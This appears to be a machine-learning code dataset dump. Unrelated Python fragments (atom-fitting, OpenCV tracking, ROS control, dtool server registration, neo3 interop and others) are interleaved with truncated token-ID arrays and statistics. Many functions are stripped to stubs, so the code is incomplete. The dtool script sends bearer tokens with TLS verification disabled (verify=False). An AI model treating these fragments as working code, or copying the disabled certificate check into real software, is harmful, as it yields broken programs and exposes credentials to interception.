y_neighbor_atoms = [self.h5_guess['y'][self.closest_neighbors_mat[atom_ind][i]] for i in
range(self.num_nearest_neighbors)]
# select the window we're going to be fitting
x_range = slice(max(int(np.round(x_center_atom - fit_region_size)), 0),
min(int(np.round(x_center_atom + fit_region_size)),
self.cropped_clean_image.shape[0]))
y_range = slice(max(int(np.round(y_center_atom - fit_region_size)), 0),
min(int(np.round(y_center_atom + fit_region_size)),
self.cropped_clean_image.shape[1]))
fit_region = self.cropped_clean_image[x_range, y_range]
# define x and y fitting range
s1, s2 = np.meshgrid(range(x_range.start, x_range.stop),
range(y_range.start, y_range.stop))
# guesses are different if we're fitting the initial windows
if initial_motifs:
# If true, we need to generate more crude guesses
# for the initial motif window fitting.
# Once these have been fit properly they will act
# as the starting point for future guesses.
# put the initial guesses into the proper form
x_guess = np.hstack((x_center_atom, x_neighbor_atoms))
y_guess = np.hstack((y_center_atom, y_neighbor_atoms))
sigma_x_center_atom = self.fitting_parms['sigma_guess']
sigma_y_center_atom = self.fitting_parms['sigma_guess']
sigma_x_neighbor_atoms = [self.fitting_parms['sigma_guess'] for i in
range(self.num_nearest_neighbors)]
sigma_y_neighbor_atoms = [self.fitting_parms['sigma_guess'] for i in
range(self.num_nearest_neighbors)]
theta_center_atom = 0
theta_neighbor_atoms = np.zeros(self.num_nearest_neighbors)
background_center_atom = np.min(fit_region)
# The existence of a background messes up a straight forward gaussian amplitude guess,
# so we add/subtract the background value from the straight forward guess depending
# on if the background is positive or negative.
if np.min(fit_region) < 0:
a_guess = self.cropped_clean_image[
np.rint(x_guess).astype(int), np.rint(y_guess).astype(int)] - background_center_atom
else:
a_guess = self.cropped_clean_image[
np.rint(x_guess).astype(int), np.rint(y_guess).astype(int)] + background_center_atom
sigma_x_guess = np.hstack((sigma_x_center_atom, sigma_x_neighbor_atoms))
sigma_y_guess = np.hstack((sigma_y_center_atom, sigma_y_neighbor_atoms))
theta_guess = np.hstack((theta_center_atom, theta_neighbor_atoms))
background_guess = np.hstack([background_center_atom for num in range(
self.num_nearest_neighbors + 1)]) # we will only need one background
coef_guess_mat = np.transpose(np.vstack((a_guess, x_guess, y_guess, sigma_x_guess, sigma_y_guess,
theta_guess, background_guess)))
else:
# otherwise better guesses are assumed to exist
motif_type = self.h5_guess['type'][atom_ind]
coef_guess_mat = np.copy(self.motif_converged_parms[motif_type])
coef_guess_mat[:, 1] = self.h5_guess['x'][atom_ind] + coef_guess_mat[:, 1]
coef_guess_mat[:, 2] = self.h5_guess['y'][atom_ind] + coef_guess_mat[:, 2]
# Choose upper and lower bounds for the fitting
#
# Address negatives first
lb_a = []
ub_a = []
for item in coef_guess_mat[:, 0]: # amplitudes
if item < 0:
lb_a.append(item + item * movement_allowance)
ub_a.append(item - item * movement_allowance)
else:
lb_a.append(item - item * movement_allowance)
ub_a.append(item + item * movement_allowance)
lb_background = []
ub_background = []
for item in coef_guess_mat[:, 6]: # background
if item < 0:
lb_background.append(item + item * movement_allowance)
ub_background.append(item - item * movement_allowance)
else:
lb_background.append(item - item * movement_allowance)
ub_background.append(item + item * movement_allowance)
# Set up upper and lower bounds:
lb_mat = [lb_a, # amplitude
coef_guess_mat[:, 1] - position_range, # x position
coef_guess_mat[:, 2] - position_range, # y position
[np.max([0, value - value * movement_allowance]) for value in coef_guess_mat[:, 3]], # sigma x
[np.max([0, value - value * movement_allowance]) for value in coef_guess_mat[:, 4]], # sigma y
coef_guess_mat[:, 5] - 2 * 3.14159, # theta
lb_background] # background
ub_mat = [ub_a, # amplitude
coef_guess_mat[:, 1] + position_range, # x position
coef_guess_mat[:, 2] + position_range, # y position
coef_guess_mat[:, 3] + coef_guess_mat[:, 3] * movement_allowance, # sigma x
coef_guess_mat[:, 4] + coef_guess_mat[:, 4] * movement_allowance, # sigma y
coef_guess_mat[:, 5] + 2 * 3.14159, # theta
ub_background] # background
lb_mat = np.transpose(lb_mat)
ub_mat = np.transpose(ub_mat)
check_bounds = False
if check_bounds:
for i, item in enumerate(coef_guess_mat):
for j, value in enumerate(item):
if lb_mat[i][j] > value or ub_mat[i][j] < value:
print('Atom number: {}'.format(atom_ind))
print('Guess: {}'.format(item))
print('Lower bound: {}'.format(lb_mat[i]))
print('Upper bound: {}'.format(ub_mat[i]))
print('dtypes: {}'.format(self.atom_coeff_dtype.names))
raise ValueError('{} guess is out of bounds'.format(self.atom_coeff_dtype.names[j]))
return atom_ind, coef_guess_mat, fit_region, s1, s2, lb_mat, ub_mat
@staticmethod
def write_to_disk(self):
"""
Writes the gaussian fitting results to disk
Parameters
----------
Returns
-------
Returns the atom parent group containing the original data and the newly written data:
Gaussian_Guesses
Gaussian_Fits
Motif_Guesses
Motif_Fits
Nearest_Neighbor_Indices
"""
ds_atom_guesses = VirtualDataset('Gaussian_Guesses', data=self.guess_dataset)
ds_atom_fits = VirtualDataset('Gaussian_Fits', data=self.fit_dataset)
ds_motif_guesses = VirtualDataset('Motif_Guesses', data=self.motif_guess_dataset)
ds_motif_fits = VirtualDataset('Motif_Fits', data=self.motif_converged_dataset)
ds_nearest_neighbors = VirtualDataset('Nearest_Neighbor_Indices',
data=self.closest_neighbors_mat, dtype=np.uint32)
dgrp_atom_finding = VirtualGroup(self.atom_grp.name.split('/')[-1], parent=self.atom_grp.parent.name)
dgrp_atom_finding.attrs = self.fitting_parms
dgrp_atom_finding.add_children([ds_atom_guesses, ds_atom_fits, ds_motif_guesses,
ds_motif_fits, ds_nearest_neighbors])
hdf = HDFwriter(self.atom_grp.file)
h5_atom_refs = hdf.write(dgrp_atom_finding)
hdf.flush()
return self.atom_grp
def fit_motif(self, plot_results=True):
"""
Parameters
----------
plot_results: boolean (default = True)
Flag to specify whether a result summary should be plotted
Returns
-------
motif_converged_dataset: NxM numpy array of tuples where N is the number of motifs and M is the number
of nearest neighbors considered. Each tuple contains the converged parameters for a gaussian fit to
an atom in a motif window.
"""
self.motif_guesses = []
self.motif_parms = []
self.motif_converged_parms = []
self.fit_motifs = []
fit_region = []
# generate final dataset forms
self.motif_guess_dataset = np.zeros(shape=(self.motif_centers.shape[0], self.num_nearest_neighbors + 1),
dtype=self.motif_coeff_dtype)
self.motif_converged_dataset = np.zeros(shape=(self.motif_centers.shape[0], self.num_nearest_neighbors + 1),
dtype=self.motif_coeff_dtype)
for motif in range(len(self.motif_centers)):
# get guesses
self.motif_parms.append(self.do_guess(self.center_atom_indices[motif], initial_motifs=True))
# pull out parameters for generating the gaussians
coef_guess_mat = self.motif_parms[motif][1]
s1 = self.motif_parms[motif][3].T
s2 = self.motif_parms[motif][4].T
fit_region.append(self.motif_parms[motif][2])
# put guesses into final dataset form
self.motif_guess_dataset[motif] = [tuple(element) for element in coef_guess_mat]
# store the guess results for plotting
self.motif_guesses.append(gauss2d(s1, s2, *coef_guess_mat, **self.fitting_parms))
# fit the motif with num_nearest_neighbors + 1 gaussians
parm_list = [self.motif_parms[motif], self.fitting_parms]
fitting_results = do_fit(parm_list)
# store the converged results
self.motif_converged_parms.append(fitting_results)
self.motif_converged_dataset[motif] = [tuple(element) for element in fitting_results]
# store the images of the converged gaussians
self.fit_motifs.append(gauss2d(s1, s2, *fitting_results, **self.fitting_parms))
# calculate the relative atom positions (instead of absolute)
fitting_results[:, 1] = fitting_results[:, 1] - self.motif_centers[motif][0]
fitting_results[:, 2] = fitting_results[:, 2] - self.motif_centers[motif][1]
# plot results if desired
if plot_results:
# initialize the figure
fig, axes = plt.subplots(ncols=3, nrows=len(self.motif_centers), figsize=(14, 6 * len(self.motif_centers)))
for i, ax_row in enumerate(np.atleast_2d(axes)):
# plot the original windows
ax_row[0].imshow(fit_region[i], interpolation='none',
cmap=cmap_jet_white_center())
ax_row[0].set_title('Original Window')
# plot the initial guess windows
ax_row[1].imshow(self.motif_guesses[i], interpolation='none',
cmap=cmap_jet_white_center())
ax_row[1].set_title('Initial Gaussian Guesses')
# plot the converged gaussians
ax_row[2].imshow(self.fit_motifs[i], interpolation='none',
cmap=cmap_jet_white_center())
ax_row[2].set_title('Converged Gaussians')
fig.show()
return self.motif_converged_dataset
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
37811,
201,
198,
31,
9800,
25,
440,
358,
260,
73,
23524,
694,
201,
198,
37811,
201,
198,
201,
198,
6738,
11593,
37443,
834,
1330,
7297,
11,
3601,
62,
8818,
11,
... | 2.06013 | 10,494 |
import string
import unittest
from collections import Counter
from main import extract_characters, generate_password
if __name__ == '__main__':
unittest.main() | [
11748,
4731,
198,
11748,
555,
715,
395,
198,
6738,
17268,
1330,
15034,
198,
6738,
1388,
1330,
7925,
62,
10641,
19858,
11,
7716,
62,
28712,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
555,
71... | 3.586957 | 46 |
import asyncio
import os
import sys
from datetime import datetime, timedelta
import aiohttp
import pytest
from bungieapi.base import Token
from bungieapi.client import Client, Credentials
from bungieapi.forge import forge
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture(scope="session")
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture()
@pytest.fixture
@pytest.fixture
@pytest.fixture
| [
11748,
30351,
952,
198,
11748,
28686,
198,
11748,
25064,
198,
6738,
4818,
8079,
1330,
4818,
8079,
11,
28805,
12514,
198,
198,
11748,
257,
952,
4023,
198,
11748,
12972,
9288,
198,
198,
6738,
43974,
494,
15042,
13,
8692,
1330,
29130,
198,
... | 2.752874 | 174 |
#! /usr/bin/env python
"""Parse event definitions out of comments in source files."""
import re
import sys
import os
import string
import getopt
import glob
import fileinput
import pprint
if __name__ == '__main__':
sys.exit(main())
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
37811,
10044,
325,
1785,
17336,
503,
286,
3651,
287,
2723,
3696,
526,
15931,
198,
198,
11748,
302,
198,
11748,
25064,
198,
11748,
28686,
198,
11748,
4731,
198,
11748,
651,
8738,
... | 3.186667 | 75 |
#code based on example found at:
#http://www.pyimagesearch.com/2015/09/14/ball-tracking-with-opencv/
# import the necessary packages
from collections import deque
import numpy as np
import argparse
import imutils
import cv2
import time as t
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video",
help="path to the (optional) video file")
ap.add_argument("-b", "--buffer", type=int, default=32,
help="max buffer size")
ap.add_argument("-r", "--real", type=str, default="real",
help="real image or mask")
ap.add_argument("-t", "--type", type=str, default="blank",
help="type of find")
args = vars(ap.parse_args())
real = args.get("real")
typ = args.get("type")
raspi = False
if typ == "blank":
greenLower = (0, 0, 0)
greenUpper = (0, 0, 0)
elif typ == "BD":
greenLower = (71, 32, 37)
greenUpper = (203, 67, 65)
elif typ == "Servo":
greenLower = (72, 80, 26)
greenUpper = (140, 165, 142)
elif typ == "ppbo":
greenLower = (14, 20, 157)
greenUpper = (40, 228, 246)
elif typ == "TAC":
greenLower = (0, 16, 46)
greenUpper = (183, 170, 105)
elif typ == "bby":
greenLower = (17,121,76)
greenUpper = (52,228,218)
elif typ == "plier":
greenLower = (73,108,78)
greenUpper = (100,201,149)
elif typ == "bluey":
greenLower = (108,222,155)
greenUpper = (126,245,234)
#my eyes(broken)
#greenLower = (106, 84, 38)
#greenUpper = (138, 143, 55)
pts = deque(maxlen=args["buffer"])
# if a video path was not supplied, grab the reference
# to the webcam
if not args.get("video", False):
if raspi:
camera = cv2.VideoCapture("/dev/stdin")
else:
camera = cv2.VideoCapture(0)
# otherwise, grab a reference to the video file
else:
camera = cv2.VideoCapture(args["video"])
# keep looping
while True:
# grab the current frame
(grabbed, frame) = camera.read()
# if we are viewing a video and we did not grab a frame,
# then we have reached the end of the video
if args.get("video") and not grabbed:
break
# resize the frame, blur it, and convert it to the HSV
# color space
frame = imutils.resize(frame, width=600)
# blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
mask = cv2.inRange(hsv, greenLower, greenUpper)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)[-2]
center = None
# only proceed if at least one contour was found
if len(cnts) > 0:
# find the largest contour in the mask, then use
# it to compute the minimum enclosing circle and
# centroid
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# only proceed if the radius meets a minimum size
if radius > 10:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(frame, (int(x), int(y)), int(radius),
(0, 255, 255), 2)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
# update the points queue
pts.appendleft(center)
# loop over the set of tracked points
for i in xrange(1, len(pts)):
# if either of the tracked points are None, ignore
# them
if pts[i - 1] is None or pts[i] is None:
continue
# otherwise, compute the thickness of the line and
# draw the connecting lines
thickness = int(np.sqrt(args["buffer"] / float(i + 1)) * 2.5)
cv2.line(frame, pts[i - 1], pts[i], (0, 0, 0), thickness)
# show the frame to our screen
if real == "real":
cv2.imshow("Frame", frame)
elif real == "mask":
cv2.imshow("Frame",mask)
else:
cv2.imshow("Frame",hsv)
key = cv2.waitKey(1) & 0xFF
# if the 'q' key is pressed, stop the loop
if key == ord("q"):
break
#t.sleep(0.1)
# cleanup the camera and close any open windows
camera.release()
cv2.destroyAllWindows()
| [
2,
8189,
1912,
319,
1672,
1043,
379,
25,
198,
2,
4023,
1378,
2503,
13,
9078,
17566,
3679,
13,
785,
14,
4626,
14,
2931,
14,
1415,
14,
1894,
12,
36280,
12,
4480,
12,
9654,
33967,
14,
198,
2,
1330,
262,
3306,
10392,
198,
6738,
17268,... | 2.499409 | 1,692 |
import io
import requests
import os
from .input_file import InputFile
from .exception import AppwriteException
| [
11748,
33245,
198,
11748,
7007,
198,
11748,
28686,
198,
6738,
764,
15414,
62,
7753,
1330,
23412,
8979,
198,
6738,
764,
1069,
4516,
1330,
2034,
13564,
16922,
628
] | 4.148148 | 27 |
import click
import requests
import yaml
from dtool_lookup_server.utils import (
iter_datasets_in_base_uri,
generate_dataset_info,
)
def get_projects(fpath):
"""Return projects dictionary."""
with open(fpath) as fh:
projects = yaml.load(fh, Loader=yaml.FullLoader)
return projects
def get_header(token):
"""Return HTTP header."""
return {
"Content-Type": "application/json",
"Authorization": "Bearer {}".format(token),
}
def register_base_uris(projects_fpath, token, lookup_server_url):
"Register base URIs."
projects = get_projects(projects_fpath)
for b_uri in projects.keys():
data = {"base_uri": b_uri}
response = requests.post(
lookup_server_url + "/admin/base_uri/register",
headers=get_header(token),
json=data,
verify=False
)
print(data)
print(response.status_code, response.reason)
def register_users(projects_fpath, token, lookup_server_url):
"Register users."
projects = get_projects(projects_fpath)
users = set()
for base_uri, permissions in projects.items():
for p in ["register", "search"]:
for u in permissions[p]:
users.add(u)
data = []
for u in users:
data.append({"username": u})
response = requests.post(
lookup_server_url + "/admin/user/register",
headers=get_header(token),
json=data,
verify=False
)
print(data)
print(response.status_code, response.reason)
def register_permissions(projects_fpath, token, lookup_server_url):
"Register permissions."
projects = get_projects(projects_fpath)
for b_uri, permissions in projects.items():
data = {"base_uri": b_uri}
register_permissions = []
for u in permissions["register"]:
register_permissions.append(u)
data["users_with_register_permissions"] = register_permissions
search_permissions = []
for u in permissions["search"]:
search_permissions.append(u)
data["users_with_search_permissions"] = search_permissions
response = requests.post(
lookup_server_url + "/admin/permission/update_on_base_uri",
headers=get_header(token),
json=data,
verify=False
)
print(data)
print(response.status_code, response.reason)
def register_data(projects_fpath, token, lookup_server_url):
"Register data."
projects = get_projects(projects_fpath)
for b_uri in projects.keys():
for dataset in iter_datasets_in_base_uri(b_uri):
print(dataset.uri)
try:
dataset_info = generate_dataset_info(dataset, b_uri)
except: # NOQA
print("Failed to generate dataset info")
continue
response = requests.post(
lookup_server_url + "/dataset/register",
headers=get_header(token),
json=dataset_info,
verify=False
)
print(response.status_code, response.reason)
@click.group()
def register():
"Register base URIs, users, permissions and data in dtool-lookup-server."
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def base_uris(projects_file, token, lookup_server_url):
"Register base URIs."
register_base_uris(projects_file, token, lookup_server_url)
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def users(projects_file, token, lookup_server_url):
"Register users."
register_users(projects_file, token, lookup_server_url)
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def permissions(projects_file, token, lookup_server_url):
"Register permissions."
register_permissions(projects_file, token, lookup_server_url)
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def data(projects_file, token, lookup_server_url):
"Register data."
register_data(projects_file, token, lookup_server_url)
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def all(projects_file, token, lookup_server_url):
"Register base URI, users, permissions and data."
register_base_uris(projects_file, token, lookup_server_url)
register_users(projects_file, token, lookup_server_url)
register_permissions(projects_file, token, lookup_server_url)
register_data(projects_file, token, lookup_server_url)
if __name__ == "__main__":
register()
| [
11748,
3904,
198,
11748,
7007,
198,
11748,
331,
43695,
198,
198,
6738,
288,
25981,
62,
5460,
929,
62,
15388,
13,
26791,
1330,
357,
198,
220,
220,
220,
11629,
62,
19608,
292,
1039,
62,
259,
62,
8692,
62,
9900,
11,
198,
220,
220,
220,... | 2.48913 | 2,024 |
# Filename: test_ch.py
# pylint: disable=locally-disabled,C0111,R0904,C0301,C0103,W0212
from km3pipe.testing import TestCase, patch, Mock
from km3pipe.io.ch import CHPump
__author__ = "Tamas Gal"
__copyright__ = "Copyright 2018, Tamas Gal and the KM3NeT collaboration."
__credits__ = []
__license__ = "MIT"
__maintainer__ = "Tamas Gal"
__email__ = "tgal@km3net.de"
__status__ = "Development"
| [
2,
7066,
12453,
25,
1332,
62,
354,
13,
9078,
198,
2,
279,
2645,
600,
25,
15560,
28,
17946,
453,
12,
47730,
11,
34,
486,
1157,
11,
49,
2931,
3023,
11,
34,
3070,
486,
11,
34,
486,
3070,
11,
54,
2999,
1065,
198,
6738,
10571,
18,
... | 2.609272 | 151 |
#!/usr/bin/env python
# coding: utf-8
import rospy
from traj_generator import TrajectoryGenerator
from controller import Controller
if __name__ == '__main__':
# 1. Create new node
rospy.init_node("main_node")
rate = rospy.Rate(5) # controller freq in Hz
# init our trajectory generator and controller
traj_generator_node = TrajectoryGenerator()
ctrl = Controller()
# run main loop
time_prev = 0
time_start = rospy.get_time()
while not rospy.is_shutdown():
# compute current time and dt
t = rospy.get_time() - time_start
dt = t - time_prev
time_prev = t
if ctrl.exists_odometry(): # if robot exists
pose, vel = traj_generator_node.get_point(t) # get trajectory point for current time
ctrl.update(dt, pose, vel) # send command to robot
print(t, "Robot is moving!")
else:
print("No robot!")
rate.sleep() # wait to obtain loop frequency
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
11748,
686,
2777,
88,
198,
198,
6738,
1291,
73,
62,
8612,
1352,
1330,
4759,
752,
652,
8645,
1352,
198,
6738,
10444,
1330,
22741,
628,
198,
361,
... | 2.21174 | 477 |
from django.test import TestCase
from qatrack.qa import utils
#============================================================================
#----------------------------------------------------------------------
| [
6738,
42625,
14208,
13,
9288,
1330,
6208,
20448,
198,
198,
6738,
10662,
265,
39638,
13,
20402,
1330,
3384,
4487,
198,
198,
2,
23926,
25609,
628,
198,
220,
220,
220,
1303,
10097,
23031,
198
] | 6.666667 | 33 |
import json # import json module
# with statement
with open('./data/spider/train_raw.json') as json_file:
json_data = json.load(json_file)
type(json_data)
re_data = []
for idx, row in enumerate(json_data):
bb = {}
for i in ['db_id', 'query', 'question']:
bb[i] = row[i]
re_data.append(bb)
if idx >= 100:
break
with open('./data/spider/train.json', 'w') as outfile:
json.dump(re_data, outfile, indent=4)
import json # import json module
# with statement
with open('./data/spider/tables_raw.json') as json_file:
json_data = json.load(json_file)
json_data[0].keys()
type(json_data)
re_data = []
for idx, row in enumerate(json_data):
bb = {}
for i in ['column_names', 'column_names_original', 'column_types', 'db_id', 'foreign_keys', 'primary_keys', 'table_names', 'table_names_original']:
bb[i] = row[i]
re_data.append(bb)
if idx >= 100:
break
with open('./data/spider/tables.json', 'w') as outfile:
json.dump(re_data, outfile, indent=4) | [
198,
198,
11748,
33918,
1303,
1330,
33918,
8265,
198,
198,
2,
351,
2643,
198,
4480,
1280,
7,
4458,
14,
7890,
14,
2777,
1304,
14,
27432,
62,
1831,
13,
17752,
11537,
355,
33918,
62,
7753,
25,
198,
220,
220,
220,
33918,
62,
7890,
796,
... | 2.339408 | 439 |
# Example of Dynamic Programming for the fibonacci sequence. Extracted from https://www.youtube.com/watch?v=vYquumk4nWw
# A naive recursive solution
# A memoized solution
# A bottom-up solution | [
2,
17934,
286,
26977,
30297,
329,
262,
12900,
261,
44456,
8379,
13,
5683,
20216,
422,
3740,
1378,
2503,
13,
11604,
13,
785,
14,
8340,
30,
85,
28,
85,
56,
421,
388,
74,
19,
77,
54,
86,
198,
198,
2,
317,
24354,
45115,
4610,
628,
1... | 3.413793 | 58 |
import sys
import xml.etree.ElementTree as ET
LINE_THRESHOLD = 10
TEXT_MATCHES = [".//HedLine_hl1/*/*", ".//Content/*/*"]
TEXT_NODES = ['W','Q']
if __name__ == "__main__":
main(sys.argv) | [
11748,
25064,
198,
11748,
35555,
13,
316,
631,
13,
20180,
27660,
355,
12152,
198,
198,
24027,
62,
4221,
19535,
39,
15173,
796,
838,
198,
32541,
62,
44,
11417,
1546,
796,
685,
1911,
1003,
39,
276,
13949,
62,
18519,
16,
15211,
15211,
16... | 2.180851 | 94 |
from software_defined_assets.spark_weather_assets import spark_weather_assets
from dagster import materialize
from dagster.core.test_utils import instance_for_test
| [
6738,
3788,
62,
23211,
62,
19668,
13,
2777,
668,
62,
23563,
62,
19668,
1330,
9009,
62,
23563,
62,
19668,
198,
198,
6738,
48924,
1706,
1330,
2587,
1096,
198,
6738,
48924,
1706,
13,
7295,
13,
9288,
62,
26791,
1330,
4554,
62,
1640,
62,
... | 3.772727 | 44 |
# Copyright (c) 2011-2016 Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy import *
from lunr.db.uuidimpl import UUID
meta = MetaData()
table_kwargs = {
'mysql_engine': 'InnoDB',
'mysql_charset': 'utf8',
}
account = Table(
'account', meta,
Column('id', String(36), primary_key=True, nullable=False),
Column('status', String(32)),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
backup = Table(
'backup', meta,
Column('id', String(36), primary_key=True, nullable=False),
Column('status', String(32)),
Column('size', Integer, nullable=False),
Column('volume_id', String(36), ForeignKey('volume.id'), nullable=True),
Column('account_id', String(36), ForeignKey('account.id'), nullable=False),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
export = Table(
'export', meta,
Column('id', String(36), primary_key=True, nullable=False),
Column('status', String(32)),
Column('instance_id', String(36)),
Column('mountpoint', String(32)),
Column('ip', String(255)),
Column('initiator', String(255)),
Column('session_ip', String(255)),
Column('session_initiator', String(255)),
Column('created_at', DateTime),
Column('last_modified', DateTime),
Column('target_name', String(255)),
**table_kwargs
)
node = Table(
'node', meta,
Column('id', UUID(), primary_key=True, nullable=False),
Column('name', String(255)),
Column('status', String(32), default='ACTIVE'),
Column('size', Integer, nullable=False),
Column('volume_type_name', String(255), ForeignKey('volume_type.name'),
nullable=False),
Column('meta', String(1024)),
Column('hostname', String(256), nullable=False),
Column('port', Integer, nullable=False, default=8081),
Column('storage_hostname', String(256), nullable=False),
Column('storage_port', Integer, nullable=False, default=3260),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
volume = Table(
'volume', meta,
Column('id', String(36), primary_key=True, nullable=False),
Column('status', String(32)),
Column('size', Integer, nullable=False),
Column('volume_type_name', String(255), ForeignKey('volume_type.name'),
nullable=False),
Column('node_id', UUID(), ForeignKey('node.id')),
Column('account_id', String(36), ForeignKey('account.id'), nullable=False),
Column('clone_of', String(36), nullable=True),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
volume_type = Table(
'volume_type', meta,
Column('name', String(255), primary_key=True, nullable=False),
Column('status', String(32)),
Column('min_size', Integer, nullable=False),
Column('max_size', Integer, nullable=False),
Column('read_iops', Integer, nullable=False),
Column('write_iops', Integer, nullable=False),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
| [
2,
15069,
357,
66,
8,
2813,
12,
5304,
37927,
13200,
1294,
11,
3457,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
... | 2.841693 | 1,276 |
import pandas as pd
from pandas import DataFrame
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
df = pd.read_csv('Lite_Coin_12_Mos.csv')
print(df.head())
print(df.tail())
print(df.index)
print(df.columns)
print("-----")
print(df.describe())
#print mediuan
print('median')
print(df.median())
print("-----")
#Mode
print('mode')
print(df.mode())
print("-----")
#Variance
##In probability theory and statistics, variance is the expectation of the squared deviation of a random variable from its mean.
##Informally, it measures how far a set of numbers are spread out from their average value.
print('variance')
print(df.var())
print("-----")
#Co-Variance
print('co-variance')
print(df.cov())
#Cumsum
#print('Cumsum')
#print(df.cumsum())
#Scalar Map
#print('Map')
#print(df.applymap())
#Multiply
#print('Multiply')
#print(df.mul())
#Modulo
#print('Modulo')
#print(df.mod())
| [
11748,
19798,
292,
355,
279,
67,
198,
6738,
19798,
292,
1330,
6060,
19778,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
6738,
285,
489,
62,
25981,
74,
896,
13,
76,
29487,
18,
67,
1330,
12176,
274,
18,
35,
198,
... | 2.700297 | 337 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Name: CodyCloud Ngrok Server
# Author: Icy(enderman1024@foxmail.com)
# OS: Linux
import time, socket, threading, os, sys, json
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
6530,
25,
27035,
18839,
399,
27333,
74,
9652,
198,
2,
6434,
25,
314,
948,
7,
2194,
805,
35500,
31,
12792,
4529,
13,... | 2.363636 | 110 |
# Test osqp python module
import osqp
from osqp import constant, default_algebra
# import osqppurepy as osqp
import numpy as np
from scipy import sparse
# Unit Test
import unittest
import pytest
import numpy.testing as nptest
| [
2,
6208,
28686,
80,
79,
21015,
8265,
198,
11748,
28686,
80,
79,
198,
6738,
28686,
80,
79,
1330,
6937,
11,
4277,
62,
282,
29230,
198,
2,
1330,
28686,
80,
381,
495,
9078,
355,
28686,
80,
79,
198,
11748,
299,
32152,
355,
45941,
198,
... | 3.081081 | 74 |
from __future__ import annotations
import base64
import base58 # type: ignore
from neo3 import vm, contracts
from neo3.contracts.interop import register
@register("System.Binary.Serialize", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Deserialize", 1 << 14, contracts.CallFlags.NONE)
@register("System.Binary.Base64Encode", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Base64Decode", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Base58Encode", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Base58Decode", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Itoa", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Atoi", 1 << 12, contracts.CallFlags.NONE)
| [
6738,
11593,
37443,
834,
1330,
37647,
198,
11748,
2779,
2414,
198,
11748,
2779,
3365,
220,
1303,
2099,
25,
8856,
198,
6738,
19102,
18,
1330,
45887,
11,
8592,
198,
6738,
19102,
18,
13,
28484,
82,
13,
3849,
404,
1330,
7881,
628,
198,
31... | 3 | 250 |
from json import loads
from os.path import isfile, splitext
from sys import argv, exit
from highcharts import Highchart
DOCS = 'docs'
RESPONSE = 'response'
LANG = 'tweet_lang'
COUNTRY = 'user_location'
TITLE = 'title'
TEXT = 'text'
# Make sure we have the correct command line arguments
if len(argv) != 4:
print "Please provide command line arguments as follows:"
print "python pie.py <JSON Query Results> <By Language Output File> <By Country Output File>"
exit(0)
if isfile(argv[1]):
with open(argv[1], 'r') as jsonFile:
jsonInput = loads(jsonFile.read())
else:
jsonInput = loads(argv[1])
if RESPONSE in jsonInput:
if DOCS in jsonInput[RESPONSE]:
docs = jsonInput[RESPONSE][DOCS]
else:
print "'docs' list not found in JSON 'response'!"
exit(0)
else:
print "'response' dictionary not found in JSON!"
exit(0)
langs = {}
countries = {}
for doc in docs:
if LANG in doc:
lang = doc[LANG]
if lang:
lang = lang.upper()
if lang in langs:
langs[lang] += 1
else:
